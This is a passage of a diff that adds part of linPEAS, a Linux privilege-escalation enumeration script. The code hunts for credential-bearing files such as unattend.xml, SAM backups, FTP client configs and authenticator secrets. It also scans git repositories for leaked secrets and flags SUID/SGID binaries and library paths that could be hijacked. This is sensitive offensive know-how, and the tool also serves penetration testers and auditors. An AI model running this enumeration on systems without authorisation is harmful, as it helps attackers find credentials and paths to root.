+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"SecEvent\.Evt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "SecEvent.Evt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "SecEvent\.Evt$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,SecEvent\.Evt$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"appcmd\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "appcmd.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "appcmd\.exe$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,appcmd\.exe$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"bash\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "bash.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "bash\.exe$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,bash\.exe$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"datasources\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "datasources.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "datasources\.xml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,datasources\.xml$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"default\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "default.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "default\.sav$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,default\.sav$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"drives\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "drives.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "drives\.xml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,drives\.xml$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"groups\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "groups.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "groups\.xml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,groups\.xml$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"https-xampp\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "https-xampp.conf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "https-xampp\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,https-xampp\.conf$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"https\.conf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "https.conf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "https\.conf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,https\.conf$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"iis6\.log$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "iis6.log"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "iis6\.log$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,iis6\.log$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"index\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "index.dat"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "index\.dat$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,index\.dat$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"my\.cnf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "my.cnf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "my\.cnf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,my\.cnf$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"my\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "my.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "my\.ini$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,my\.ini$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"ntuser\.dat$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ntuser.dat"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "ntuser\.dat$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,ntuser\.dat$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"pagefile\.sys$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "pagefile.sys"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "pagefile\.sys$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,pagefile\.sys$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"printers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "printers.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "printers\.xml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,printers\.xml$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"recentservers\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "recentservers.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "recentservers\.xml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,recentservers\.xml$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"scclient\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "scclient.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "scclient\.exe$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,scclient\.exe$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"scheduledtasks\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "scheduledtasks.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "scheduledtasks\.xml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,scheduledtasks\.xml$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"security\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "security.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "security\.sav$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,security\.sav$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"server\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "server.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "server\.xml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,server\.xml$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"setupinfo$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "setupinfo"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "setupinfo$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,setupinfo$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"setupinfo\.bak$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "setupinfo.bak"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "setupinfo\.bak$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,setupinfo\.bak$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sitemanager\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sitemanager.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sitemanager\.xml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,sitemanager\.xml$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sites\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sites.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sites\.ini$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,sites\.ini$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"software$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "software"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "software$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,software$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"software\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "software.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "software\.sav$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,software\.sav$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sysprep\.inf$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sysprep.inf"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sysprep\.inf$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,sysprep\.inf$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"sysprep\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "sysprep.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "sysprep\.xml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,sysprep\.xml$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"system\.sav$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "system.sav"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "system\.sav$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,system\.sav$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.txt$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.txt"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattend\.txt$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,unattend\.txt$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattend\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattend.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattend\.xml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,unattend\.xml$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"unattended\.xml$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "unattended.xml"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "unattended\.xml$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,unattended\.xml$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"wcx_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wcx_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "wcx_ftp\.ini$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,wcx_ftp\.ini$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"ws_ftp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "ws_ftp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "ws_ftp\.ini$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,ws_ftp\.ini$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"web.*\.config$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "web*.config"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "web.*\.config$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,web.*\.config$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"winscp\.ini$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "winscp.ini"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "winscp\.ini$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,winscp\.ini$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_WINDOWS\" | grep -E \"wsl\.exe$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "wsl.exe"; fi; fi; printf "%s" "$PSTORAGE_WINDOWS" | grep -E "wsl\.exe$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,wsl\.exe$,${SED_RED},"; done; echo "";
+fi
+
+
+if [ "$PSTORAGE_OTHER_INTERESTING" ] || [ "$DEBUG" ]; then
+ print_2title "Analyzing Other Interesting Files (limit 70)"
+ if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.bashrc$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".bashrc"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.bashrc$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.bashrc$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.google_authenticator$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".google_authenticator"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.google_authenticator$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.google_authenticator$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"hosts\.equiv$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found "hosts.equiv"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "hosts\.equiv$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,hosts\.equiv$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.lesshst$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".lesshst"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.lesshst$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.lesshst$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.plan$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".plan"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.plan$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.plan$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.profile$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".profile"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.profile$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.profile$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.recently-used\.xbel$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".recently-used.xbel"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.recently-used\.xbel$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.recently-used\.xbel$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.rhosts$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".rhosts"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.rhosts$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.rhosts$,${SED_RED},"; done; echo "";
+ if ! [ "`echo \"$PSTORAGE_OTHER_INTERESTING\" | grep -E \"\.sudo_as_admin_successful$\"`" ]; then if [ "$DEBUG" ]; then echo_not_found ".sudo_as_admin_successful"; fi; fi; printf "%s" "$PSTORAGE_OTHER_INTERESTING" | grep -E "\.sudo_as_admin_successful$" | while read f; do if ! [ -d "$f" ]; then continue; fi; ls -ld "$f" | sed -${E} "s,\.sudo_as_admin_successful$,${SED_RED},"; done; echo "";
+fi
+
+
+if ! [ "$FAST" ] && ! [ "$SUPERFAST" ] && [ "$TIMEOUT" ]; then
+ print_2title "Checking leaks in git repositories"
+ printf "%s\n" "$PSTORAGE_GITHUB" | while read f; do
+ if echo "$f" | grep -Eq ".git$"; then
+ git_dirname=$(dirname "$f")
+ if [ "$MACPEAS" ]; then
+ execBin "GitLeaks (checking $git_dirname)" "https://github.com/zricethezav/gitleaks" "$FAT_LINPEAS_GITLEAKS_MACOS" "detect -s '$git_dirname' -v | grep -E 'Description|Match|Secret|Message|Date'"
+ else
+ execBin "GitLeaks (checking $git_dirname)" "https://github.com/zricethezav/gitleaks" "$FAT_LINPEAS_GITLEAKS_LINUX" "detect -s '$git_dirname' -v | grep -E 'Description|Match|Secret|Message|Date'"
+ fi
+ fi
+ done
+fi
+
+fi
+echo ''
+echo ''
+if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
+
+if echo $CHECKS | grep -q interesting_files; then
+print_title "Interesting Files"
+###########################################
+#----------) Interesting files (----------#
+###########################################
+
+check_critial_root_path(){
+ folder_path="$1"
+ if [ -w "$folder_path" ]; then echo "You have write privileges over $folder_path" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
+ if [ "$(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $folder_path -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')')" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
+ if [ "$(find $folder_path -type f -not -user root 2>/dev/null)" ]; then echo "The following files aren't owned by root: $(find $folder_path -type f -not -user root 2>/dev/null)"; fi
+}
+
+
+
+
+##-- IF) SUID
+print_2title "SUID - Check easy privesc, exploits and write perms"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid"
+if ! [ "$STRINGS" ]; then
+ echo_not_found "strings"
+fi
+if ! [ "$STRACE" ]; then
+ echo_not_found "strace"
+fi
+suids_files=$(find $ROOT_FOLDER -perm -4000 -type f ! -path "/dev/*" 2>/dev/null)
+for s in $suids_files; do
+ s=$(ls -lahtr "$s")
+ #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
+ if echo "$s" | grep -qE "^total"; then break; fi
+
+ sname="$(echo $s | awk '{print $9}')"
+ if [ "$sname" = "." ] || [ "$sname" = ".." ]; then
+ true #Don't do nothing
+ elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
+ echo "You own the SUID file: $sname" | sed -${E} "s,.*,${SED_RED},"
+ elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
+ echo "You can write SUID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+ else
+ c="a"
+ for b in $sidB; do
+ if echo $s | grep -q $(echo $b | cut -d % -f 1); then
+ echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m,"
+ c=""
+ break;
+ fi
+ done;
+ if [ "$c" ]; then
+ if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then
+ echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW},"
+ else
+ echo "$s (Unknown SUID binary!)" | sed -${E} "s,/.*,${SED_RED},"
+ printf $ITALIC
+ if ! [ "$FAST" ] && [ "$STRINGS" ]; then
+ $STRINGS "$sname" 2>/dev/null | sort | uniq | while read sline; do
+ sline_first="$(echo "$sline" | cut -d ' ' -f1)"
+ if echo "$sline_first" | grep -qEv "$cfuncs"; then
+ if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
+ if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
+ printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
+ fi
+ else #If not a path
+ if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/' && echo "$sline_first" | grep -Eqv "\.\."; then #Check if existing binary
+ printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline) (https://tinyurl.com/suidpath)\n"
+ fi
+ fi
+ fi
+ done
+ if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && ! [ "$NOTEXPORT" ] && [ -x "$sname" ]; then
+ printf $ITALIC
+ echo "----------------------------------------------------------------------------------------"
+ echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..."
+ OLD_LD_LIBRARY_PATH=$LD_LIBRARY_PATH
+ export LD_LIBRARY_PATH=""
+ timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g"
+ printf $NC
+ export LD_LIBRARY_PATH=$OLD_LD_LIBRARY_PATH
+ echo "----------------------------------------------------------------------------------------"
+ echo ""
+ fi
+ fi
+ fi
+ fi
+ fi
+done;
+echo ""
+
+
+##-- IF) SGID
+print_2title "SGID"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid"
+sgids_files=$(find $ROOT_FOLDER -perm -2000 -type f ! -path "/dev/*" 2>/dev/null)
+for s in $sgids_files; do
+ s=$(ls -lahtr "$s")
+ #If starts like "total 332K" then no SUID bin was found and xargs just executed "ls" in the current folder
+ if echo "$s" | grep -qE "^total";then break; fi
+
+ sname="$(echo $s | awk '{print $9}')"
+ if [ "$sname" = "." ] || [ "$sname" = ".." ]; then
+ true #Don't do nothing
+ elif ! [ "$IAMROOT" ] && [ -O "$sname" ]; then
+ echo "You own the SGID file: $sname" | sed -${E} "s,.*,${SED_RED},"
+ elif ! [ "$IAMROOT" ] && [ -w "$sname" ]; then #If write permision, win found (no check exploits)
+ echo "You can write SGID file: $sname" | sed -${E} "s,.*,${SED_RED_YELLOW},"
+ else
+ c="a"
+ for b in $sidB; do
+ if echo "$s" | grep -q $(echo $b | cut -d % -f 1); then
+ echo "$s" | sed -${E} "s,$(echo $b | cut -d % -f 1),${C}[1;31m& ---> $(echo $b | cut -d % -f 2)${C}[0m,"
+ c=""
+ break;
+ fi
+ done;
+ if [ "$c" ]; then
+ if echo "$s" | grep -qE "$sidG1" || echo "$s" | grep -qE "$sidG2" || echo "$s" | grep -qE "$sidG3" || echo "$s" | grep -qE "$sidG4" || echo "$s" | grep -qE "$sidVB" || echo "$s" | grep -qE "$sidVB2"; then
+ echo "$s" | sed -${E} "s,$sidG1,${SED_GREEN}," | sed -${E} "s,$sidG2,${SED_GREEN}," | sed -${E} "s,$sidG3,${SED_GREEN}," | sed -${E} "s,$sidG4,${SED_GREEN}," | sed -${E} "s,$sidVB,${SED_RED_YELLOW}," | sed -${E} "s,$sidVB2,${SED_RED_YELLOW},"
+ else
+ echo "$s (Unknown SGID binary)" | sed -${E} "s,/.*,${SED_RED},"
+ printf $ITALIC
+ if ! [ "$FAST" ] && [ "$STRINGS" ]; then
+ $STRINGS "$sname" | sort | uniq | while read sline; do
+ sline_first="$(echo $sline | cut -d ' ' -f1)"
+ if echo "$sline_first" | grep -qEv "$cfuncs"; then
+ if echo "$sline_first" | grep -q "/" && [ -f "$sline_first" ]; then #If a path
+ if [ -O "$sline_first" ] || [ -w "$sline_first" ]; then #And modifiable
+ printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is using $RED$sline_first$NC$ITALIC and you can modify it (strings line: $sline)\n"
+ fi
+ else #If not a path
+ if [ ${#sline_first} -gt 2 ] && command -v "$sline_first" 2>/dev/null | grep -q '/'; then #Check if existing binary
+ printf "$ITALIC --- It looks like $RED$sname$NC$ITALIC is executing $RED$sline_first$NC$ITALIC and you can impersonate it (strings line: $sline)\n"
+ fi
+ fi
+ fi
+ done
+ if ! [ "$FAST" ] && [ "$TIMEOUT" ] && [ "$STRACE" ] && [ ! "$SUPERFAST" ]; then
+ printf "$ITALIC"
+ echo " --- Trying to execute $sname with strace in order to look for hijackable libraries..."
+ timeout 2 "$STRACE" "$sname" 2>&1 | grep -i -E "open|access|no such file" | sed -${E} "s,open|access|No such file,${SED_RED}$ITALIC,g"
+ printf "$NC"
+ echo ""
+ fi
+ fi
+ fi
+ fi
+ fi
+done;
+echo ""
+
+##-- IF) Misconfigured ld.so
+if ! [ "$SEARCH_IN_FOLDER" ] && ! [ "$IAMROOT" ]; then
+ print_2title "Checking misconfigurations of ld.so"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#ld-so"
+ printf $ITALIC"/etc/ld.so.conf\n"$NC;
+ cat /etc/ld.so.conf 2>/dev/null | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
+ cat /etc/ld.so.conf 2>/dev/null | while read l; do
+ if echo "$l" | grep -q include; then
+ ini_path=$(echo "$l" | cut -d " " -f 2)
+ fpath=$(dirname "$ini_path")
+ if [ "$(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" ]; then echo "You have write privileges over $(find $fpath -type f '(' '(' -user $USER ')' -or '(' -perm -o=w ')' -or '(' -perm -g=w -and '(' $wgroups ')' ')' ')' 2>/dev/null)" | sed -${E} "s,.*,${SED_RED_YELLOW},"; fi
+ printf $ITALIC"$fpath\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
+ for f in $fpath/*; do
+ printf $ITALIC" $f\n"$NC | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
+ cat "$f" | grep -v "^#" | sed -${E} "s,$ldsoconfdG,${SED_GREEN}," | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g"
+ done
+ fi
+ done
+ echo ""
+fi
+
+##-- IF) Capabilities
+if ! [ "$SEARCH_IN_FOLDER" ]; then
+ print_2title "Capabilities"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#capabilities"
+ if [ "$(command -v capsh)" ]; then
+ echo "Current env capabilities:"
+ (capsh --print 2>/dev/null | grep "Current:" | sed -${E} "s,$capsB,${SED_RED_YELLOW}," ) || echo_not_found "capsh"
+ echo "Current proc capabilities:"
